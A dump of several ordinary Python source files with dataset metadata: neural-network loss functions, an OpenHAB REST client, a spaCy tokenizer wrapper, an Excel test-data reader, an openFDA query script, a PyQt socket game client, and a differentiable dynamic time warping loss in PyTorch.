C\n\n Returns a tuple of:\n - loss: Scalar giving the loss\n - dx: Gradient of the loss with respect to x\n \"\"\"\n N = x.shape[0]\n correct_class_scores = x[np.arange(N), y]\n margins = np.maximum(0, x - correct_class_scores[:, np.newaxis] + 1.0)\n margins[np.arange(N), y] = 0\n loss = np.sum(margins) / N\n num_pos = np.sum(margins > 0, axis=1)\n dx = np.zeros_like(x)\n dx[margins > 0] = 1\n dx[np.arange(N), y] -= num_pos\n dx /= N\n return loss, dx\n\n\ndef softmax_loss(x, y):\n \"\"\"\n Computes the loss and gradient for softmax classification.\n\n Inputs:\n - x: Input data, of shape (N, C) where x[i, j] is the score for the jth class\n for the ith input.\n - y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and\n 0 <= y[i] < C\n\n Returns a tuple of:\n - loss: Scalar giving the loss\n - dx: Gradient of the loss with respect to x\n \"\"\"\n probs = np.exp(x - np.max(x, axis=1, keepdims=True))\n probs /= np.sum(probs, axis=1, keepdims=True)\n N = x.shape[0]\n loss = -np.sum(np.log(probs[np.arange(N), y])) / N\n dx = probs.copy()\n dx[np.arange(N), y] -= 1\n dx /= N\n return loss, dx\n", "sub_path": "assignment2/cs231n/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 26335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.maximum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 324, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 325, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 327, "usage_type": "name"}, {"api_name": "numpy.fromiter", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 342, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.fromiter", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 484, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 495, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 500, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 565, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 566, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 572, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 586, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 591, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 596, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 731, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 731, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 735, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 737, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 761, "usage_type": "call"}]} +{"seq_id": "1144281", "text": "import requests\nimport base64\nclass OpenHab:\n\n def __init__(self): \n self.openhab_host = \"localhost\"\n self.openhab_port = \"8080\"\n\n def post_command(self, key, value):\n print(\"appel de post_command(\" + key +\",\"+ value +\")\")\n \"\"\" Post a command to OpenHAB - key is item, value is command \"\"\"\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, key)\n try:\n req = requests.post(url, data=value,\n headers=self.basic_header())\n except requests.ConnectionError:\n print (\" Erreur dans l'adressage du serveur openHab\")\n\n def put_status(self, key, value):\n \"\"\" Put a status update to OpenHAB key is item, value is state \"\"\"\n url = 'http://%s:%s/rest/items/%s/state'%(self.openhab_host,\n self.openhab_port, key)\n req = requests.put(url, data=value, headers=self.basic_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n\n def get_status(self, name):\n \"\"\" Request updates for any item in group NAME from OpenHAB.\n Long-polling will not respond until item updates.\n \"\"\"\n # When an item in Group NAME changes we will get all items in the group \n # and need to determine which has changed\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, name)\n payload = {'type': 'json'}\n try:\n req = requests.get(url, params=payload,\n headers=self.polling_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n # Try to parse JSON response\n # At top level, there is type, name, state, link and members array\n members = req.json()[\"members\"]\n for member in members:\n # Each member has a type, name, state and link\n name = member[\"name\"]\n state = member[\"state\"]\n do_publish = True\n # Pub unless we had key before and it hasn't changed\n if name in self.prev_state_dict:\n if self.prev_state_dict[name] == state:\n do_publish = False\n self.prev_state_dict[name] = state\n if do_publish:\n self.publish(name, state)\n except:\n print(\"error located in openhab.py\")\n\n def basic_header(self):\n \"\"\" Header for OpenHAB REST request - standard \"\"\"\n \"\"\"self.auth = base64.encodestring('%s:%s'\n %(self.username, self.password)\n ).replace('\\n', '')\"\"\"\n return {\n #\"Authorization\" : \"Basic %s\" %self.auth,\n \"Content-type\": \"text/plain\"}\n\n\n", "sub_path": "openhab.py", "file_name": "openhab.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.post", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 17, "usage_type": "attribute"}, {"api_name": "requests.put", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 25, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "593230159", "text": "\"\"\"\nThe wrapper over the spaCy's Tokenizer for `English`,`German`,`Spanish`,`Portuguese`,`French`,`Italian`, and `Dutch`.\n Based on the library's documentation website, the tokenization algorithm can be summarized as follows:\n 1. Iterate over space-separated substrings\n 2. Check whether we have an explicitly defined rule for this substring. If we do, use it.\n 3. Otherwise, try to consume a prefix.\n 4. If we consumed a prefix, go back to the beginning of the loop, so that special-cases always get priority.\n 5. If we didn't consume a prefix, try to consume a suffix.\n 6. If we can't consume a prefix or suffix, look for \"infixes\" — stuff like hyphens etc.\n 7. Once we can't consume any more of the string, handle it as a single token.\nFor more info regarding the tokenizer please see the \"Tokenization\" part of https://spacy.io/usage/linguistic-features\nA valid use case of the tokenizer wrapper class could be:\n SpaCyTokenizer().tokenize(\"This is a test\", LanguageIdentifier.en)\n\"\"\"\nfrom typing import List\n\nimport spacy\n\nfrom translate.readers.constants import LanguageIdentifier as LId\n\n__author__ = \"Hassan S. Shavarani\"\n\n\nclass SpaCyTokenizer:\n def __init__(self):\n \"\"\"\n The tokenizer performs lazy instantiation of the models. You don't need multiple instances of this class for\n tokenization of sentences from different languages.\n \"\"\"\n self._models = {}\n self._supported_languages = [LId.en, LId.de, LId.es, LId.pt, LId.fr, LId.it, LId.nl]\n\n def tokenize(self, text: str, lang_identifier: LId, lower_case: bool = False) -> List[str]:\n \"\"\"\n :param text: the string to be tokenized\n :param lang_identifier: one of the langugage values defined in `translate.readers.constants.LanguageIdentifier`\n :param lower_case: the flag indicating whether the resulting tokens need to be lower-cased or not.\n :return: the list of tokenized strings\n \"\"\"\n if lang_identifier not in self._supported_languages:\n raise ValueError(\"SpaCyTokenizer cannot tokenize utterances in \\\"{}\\\"\".format(lang_identifier.name))\n if lang_identifier not in self._models:\n try:\n self._models[lang_identifier] = spacy.load(lang_identifier.name)\n except OSError:\n raise EnvironmentError(\"The spaCy resources for \\\"{0}\\\" might not be installed correctly, please try \"\n \"running the following command in your comman-line before running this project\\n\"\n \"python -m spacy download {0}\".format(lang_identifier.name))\n tokenized_document = self._models[lang_identifier].tokenizer(text)\n if lower_case:\n return [token.text.lower() for token in tokenized_document]\n else:\n return [token.text for token in tokenized_document]\n", "sub_path": "src/translate/readers/tokenizer.py", "file_name": "tokenizer.py", "file_ext": "py", "file_size_in_byte": 2903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "translate.readers.constants.LanguageIdentifier.en", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 31, "usage_type": "name"}, {"api_name": "translate.readers.constants.LanguageIdentifier.de", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.es", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.pt", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.fr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.it", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.nl", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 33, "usage_type": "name"}, {"api_name": "spacy.load", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "549646007", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/6/3 11:10\n@Author : WangHuan\n@Contact : hi_chengzi@126.com\n@File : data.py\n@Software: PyCharm\n@description: 读取excel中的数据方便testcase直接使用\n\"\"\"\n\nimport os\nimport json\nimport xlrd\n\n\nclass ReadData(object):\n\n def __init__(self, filename):\n scr_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n data_path = os.path.join(scr_path, \"data\", filename)\n data_open = xlrd.open_workbook(data_path)\n self.data_excel = data_open.sheet_by_index(0)\n\n def get_url(self):\n '''\n 获取请求的url\n :return:\n '''\n url = self.data_excel.cell(1, 3).value\n return url\n\n def get_method(self, case_name):\n '''\n 获取请求类型\n :param case_name:\n :return:\n '''\n return self.get_case(case_name=case_name)[4]\n\n def get_data(self, case_name):\n '''\n 获取请求数据,转化为字典格式\n :param case_name:\n :return:\n '''\n return json.loads(self.get_case(case_name)[6])\n\n def get_expect(self, case_name):\n '''\n 期望结果\n :param case_name:\n :return:\n '''\n return self.get_case(case_name)[7]\n\n def get_case(self, case_name):\n '''\n 根据case_name找到对应用例行\n :param case_name:\n :return: 用例所在行\n '''\n\n for i in range(1, self.data_excel.nrows):\n if self.data_excel.cell(i, 1).value == case_name:\n return self.data_excel.row_values(i)\n\n print(\"用例名称未找到\")\n return None\n\n\nif __name__ == '__main__':\n data = ReadData(\"test_login_data.xlsx\")\n url = data.get_url()\n method = data.get_method(\"test_login_normal\")\n json = data.get_data(\"test_login_normal\")\n expect = data.get_expect(\"test_login_normal\")\n print(url, method)\n print(type(json))\n print(json)\n print(expect)\n", "sub_path": "interface/src/common/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 2006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "xlrd.open_workbook", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "411078685", "text": "# Importamos los módulos y bibliotecas necesarios para realizar este programa\nimport http.client\nimport json\n\n# Empleamos un código que utiliza la biblioteca http.client que hemos importado para leer repositorios\nheaders = {'User-Agent': 'http-client'}\nconn = http.client.HTTPSConnection(\"api.fda.gov\")\nconn.request(\"GET\", \"/drug/label.json?limit=10\", None, headers) # Con limit=10 encontraremos 10 medicamentos distintos\nr1 = conn.getresponse()\nprint(r1.status, r1.reason)\nrepos_raw = r1.read().decode(\"utf-8\")\nconn.close()\ninformacion = json.loads(repos_raw)\n\n# sabemos que en la página a la que accedemos el contenido es json y json se encuentra en forma de diccionario por tanto utilizamos las funciones de un diccionario para encontrar los diferentes elementos\nmedicamento_info=informacion[\"results\"]\n\n# Indexamos entre los distintos elementos de la página para imprimir los diez que hay en ella\nfor i in range(len(medicamento_info)):\n info = medicamento_info[i]\n print(\"Id del medicamento:\",info[\"id\"])\n", "sub_path": "openfda-1/Programa 2.py", "file_name": "Programa 2.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "http.client.client.HTTPSConnection", "line_number": 7, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 7, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 7, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "152187708", "text": "from PyQt5.QtCore import QThread, pyqtSignal\nimport socket\nimport errno\n\n\nclass ClientThread(QThread):\n oppo = pyqtSignal(str)\n rply = pyqtSignal(str)\n error = pyqtSignal(str)\n rematch = pyqtSignal(str)\n draw = pyqtSignal(str)\n\n def __init__(self, username, ip, parent=None):\n super(ClientThread, self).__init__(parent)\n self.username = username\n self.ip = ip\n\n def run(self):\n rcv = False\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.s.connect((self.ip, 1234))\n self.s.sendall(bytes(self.username, 'utf-8'))\n except ConnectionRefusedError as e:\n self.error.emit(\"nTarget Refused to Connect\")\n\n try:\n while True:\n msg = self.s.recv(10)\n msg = msg.decode('utf-8')\n\n if not rcv:\n self.oppo.emit(msg)\n rcv = True\n\n elif msg == \"D\":\n self.draw.emit(msg)\n\n elif msg == \"R\":\n self.rematch.emit(msg)\n\n else:\n self.rply.emit(msg)\n\n except IOError as e:\n if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n if rcv:\n self.error.emit(\"yOpponent Disconnected\")\n\n except Exception as e:\n self.error.emit('yUnknown Error: {}'.format(str(e)))\n\n def send(self, data):\n self.s.sendall(bytes(data, \"utf-8\"))\n", "sub_path": "Client.py", "file_name": "Client.py", "file_ext": "py", "file_size_in_byte": 1513, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 7, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 20, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 20, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 20, "usage_type": "attribute"}, {"api_name": "errno.EAGAIN", "line_number": 46, "usage_type": "attribute"}, {"api_name": "errno.EWOULDBLOCK", "line_number": 46, "usage_type": "attribute"}]} +{"seq_id": "306234088", "text": "# Macros and libararies\nfrom math import isinf\nfrom numpy import array, zeros, full, argmin, inf, ndim\nimport numpy as np\nimport torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\ndef dtw(x, y, dist, warp=1, w=inf, s=1.0):\n \"\"\"\n Computes Dynamic Time Warping (DTW) of two sequences.\n :param array x: N1*M array\n :param array y: N2*M array\n :param func dist: distance used as cost measure\n :param int warp: how many shifts are computed.\n :param int w: window size limiting the maximal distance between indices of matched entries |i,j|.\n :param float s: weight applied on off-diagonal moves of the path. As s gets larger, the warping path is increasingly biased towards the diagonal\n Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the wrap path.\n \"\"\"\n assert len(x)\n assert len(y)\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n r, c = len(x), len(y)\n if not isinf(w):\n D0 = full((r + 1, c + 1), inf)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = zeros((r + 1, c + 1))\n D0[0, 1:] = inf\n D0[1:, 0] = inf\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[i], y[j])\n C = D1.copy()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = range(max(0, i - w), min(c, i + w + 1))\n for j in jrange:\n min_list = [D0[i, j]]\n for k in range(1, warp + 1):\n i_k = min(i+k, r)\n j_k = min(j+k, c)\n min_list += [D0[i_k, j] * s, D0[i, j_k] * s]\n D1[i, j] += min(min_list)\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\n# We define two sequences x, y as numpy array\n# where y is actually a sub-sequence from x\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\n\n\neuclidean_norm = lambda x, y: np.abs(x - y)\n\nd, cost_matrix, acc_cost_matrix, path = dtw(x, y, dist=euclidean_norm)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\nplt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\nplt.plot(path[0], path[1], 'w')\n#plt.show()\n\n\n\n\n# this cannot handle inf, -\\rho * x too big, e^{- \\rho * x} close to 0\ndef smooth_min(x, rho=10):\n eps = 1e-12\n val = -1/rho * T.log(T.mean(T.exp(x * (-rho))) + eps)\n assert val!=float('inf'), T.mean(T.exp(x * (-rho)))\n return val\n\nrho = 10\nx = T.tensor([100.0, 2.0231, 100.0])\nprint (smooth_min(x,rho))\n\n\n# 1d min func is 1\n\n\n# this will serve as a loss function\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\n\ndef diff_dtw_loss(x, y, dist, warp=1, w=inf, s=1.0, rho=40):\n \"\"\" differentiable dtw, takes two sequences and\n compute the distance under the metric\n x, y is a tensor seq_len x dim\n dist is a bi-variate function\n \"\"\"\n\n assert x.shape[0]\n assert y.shape[0]\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n\n MAX_VAL = 1e2\n\n r, c = x.shape[0], y.shape[0]\n if not isinf(w):\n D0 = T.full((r + 1, c + 1), MAX_VAL)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = T.zeros(r + 1, c + 1)\n D0[0, 1:] = MAX_VAL\n D0[1:, 0] = MAX_VAL\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n #print(\"dtw size\", x.size(), y.size())\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[0][i], y[0][j])\n C = D1.clone()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = range(max(0, i - w), min(c, i + w + 1))\n for j in jrange:\n min_list = D0[i, j]\n for k in range(1, warp + 1):\n # print(i+k, r)\n i_k = min(i + k, r)\n j_k = min(j + k, c)\n min_list = T.cat((T.tensor([min_list], requires_grad=True), \\\n T.tensor([D0[i_k, j] * s], requires_grad=True), \\\n T.tensor([D0[i, j_k] * s], requires_grad=True)))\n # Softmin is NOT a smooth min function\n min_val = smooth_min(min_list, rho)\n # print('min:', i, j, min_val, min_list)\n D1[i, j] = D1[i, j] + min_val\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\n\n\ntensor_x = T.tensor(T.from_numpy(x), requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y), requires_grad=True)\n\n\neuclidean_norm = lambda x, y: T.abs(x - y)\n\n#diff_d, diff_cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(tensor_x, tensor_y, dist=euclidean_norm)\n\n#print('distance', diff_d, 'diff distance:', diff_d.detach().numpy())\n#diff_acc_cost_matrix = diff_acc_cost_matrix.detach().numpy()\n# print(acc_cost_matrix)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\n#fig, (ax1, ax2) = plt.subplots(1, 2)\n#fig.suptitle('Original and Differentiable Accumated Cost Matrix')\n#ax1.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax1.plot(path[0], path[1], 'w')\n#ax2.imshow(diff_acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax2.plot(diff_path[0], diff_path[1], 'w')\n\n\n# plt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n# plt.plot(path[0], path[1], 'w')\n# plt.show()\n\n\nimport torch as T\nfrom torch.nn import functional as F\n\nfrom torch.nn.modules import Module\n\nclass _Loss(Module):\n def __init__(self, size_average=None, reduce=None, reduction='mean', _Reduction=None):\n super(_Loss, self).__init__()\n if size_average is not None or reduce is not None:\n self.reduction = _Reduction.legacy_get_string(size_average, reduce)\n else:\n self.reduction = reduction\n\n\nclass DTW_Loss(_Loss):\n def __init__(self, rho=10, size_average=None, reduce=None, reduction='mean'):\n super(DTW_Loss, self).__init__(size_average, reduce, reduction)\n self.rho = rho\n\n def forward(self, output, target):\n # batch x seq_len x dim\n if ndim(output)==3:\n dist = []\n for b in range(output.size(0)):\n #print(\"sizes\", output.size(), target.size())\n d_b, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output[b], target[b], dist=euclidean_norm, rho=rho)\n dist.append(d_b)\n d = T.mean(T.stack(dist))\n else:\n d, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output, target, dist=euclidean_norm, rho=rho)\n #F.mse_loss(output, target, reduction=self.reduction)\n loss_val = d #.detach().numpy()\n return loss_val\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\n\ntensor_x = T.tensor(T.from_numpy(x),requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y),requires_grad=True)\nloss_vals = []\n\nrhos = np.linspace(1, 10,10)\n#for rho in rhos:\n #print(rho)\n #my_loss = DTW_Loss(rho)\n #loss_vals.append(my_loss(tensor_x, tensor_y))\n", "sub_path": "Peg In Hole HDR-IL/differentiableDP.py", "file_name": "differentiableDP.py", "file_ext": "py", "file_size_in_byte": 8531, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 26, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 39, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 43, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 50, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 54, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 141, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.full", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 160, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": 